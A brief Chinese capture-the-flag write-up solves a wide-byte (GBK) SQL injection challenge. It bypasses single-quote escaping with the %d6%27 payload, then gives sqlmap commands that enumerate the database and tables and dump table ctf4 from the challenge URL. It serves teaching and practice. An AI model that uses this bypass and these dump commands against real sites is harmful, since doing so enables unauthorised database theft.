南邮宽字节(sql_gbk)注入

首先题目过滤了单引号,先绕过,用%d6%27来绕过,构成一个宽字节,取消了单引号的转义,直接上sqlmap

爆数据库:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db

南邮宽字节(sql_gbk)注入_第1张图片

爆表名:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --tables -D sae-chinalover

南邮宽字节(sql_gbk)注入_第2张图片

爆ctf4表里面的数据:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --dump -T ctf4 -D sae-chinalover

南邮宽字节(sql_gbk)注入_第3张图片

你可能感兴趣的:(渗透测试)